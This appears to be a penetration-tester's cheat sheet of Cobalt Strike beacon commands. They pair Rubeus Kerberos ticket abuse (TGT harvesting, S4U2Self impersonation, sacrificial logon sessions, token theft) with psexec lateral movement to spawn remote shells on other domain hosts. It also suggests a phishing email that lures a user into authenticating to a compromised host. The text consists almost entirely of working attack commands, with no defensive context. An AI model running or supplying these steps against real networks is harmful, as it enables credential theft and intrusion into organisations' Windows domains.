[-] could not upload file: 32 - ERROR_SHARING_VIOLATION
C:\>net helpmsg 32
The process cannot access the file because it is being used by another process.
We can use Rubeus monitor and send an email to trick a user into authenticating or clicking on a host. The interaction can be as simple as including dir \\comromised-host
Using Kerberos Tickets to spawn remote shell
TGT
// Rubeus triage, dump or monitor to get a TGT.
beacon> execute-assembly C:\Tools\Rubeus.exe createnetonly
/program:C:\Windows\System32\cmd.exe /ticket:<remote host users TGT>
beacon> steal_token <PID>
beacon> jump psexec64 <remote host FQDN> smb
TGS (S4U2Self Trick)
// Rubeus triage, dump or monitor to get TGT
// Get TGS from TGT
Method 1: Get TGS, create sacrificial login, and steal token.
beacon> execute-assembly C:\Tools\Rubeus.exe s4u /impersonateuser:cfoxy /self
/altservice:cifs/<host-FQDN> /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
/domain:ROTTA /username:cfoxy /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> steal_token <PID>
beacon> jump psexec64 <remote host FQDN> smb
------------------------------------------------------------------------------------------
Method 2: (Create sacrificial login session first and pass to s4u
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
/domain:ROTTA /username:cfoxy /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> execute-assembly C:\Tools\Rubeus.exe s4u /impersonateuser:cfoxy /self
/altservice:cifs/<host-FQDN> /user:dc-2$ /ticket:doIFuj[...]lDLklP /self /ptt
beacon> run klist
beacon> ls \\<remote-host-FQDN>
beacon> jump psexec64 <remote host FQDN> smb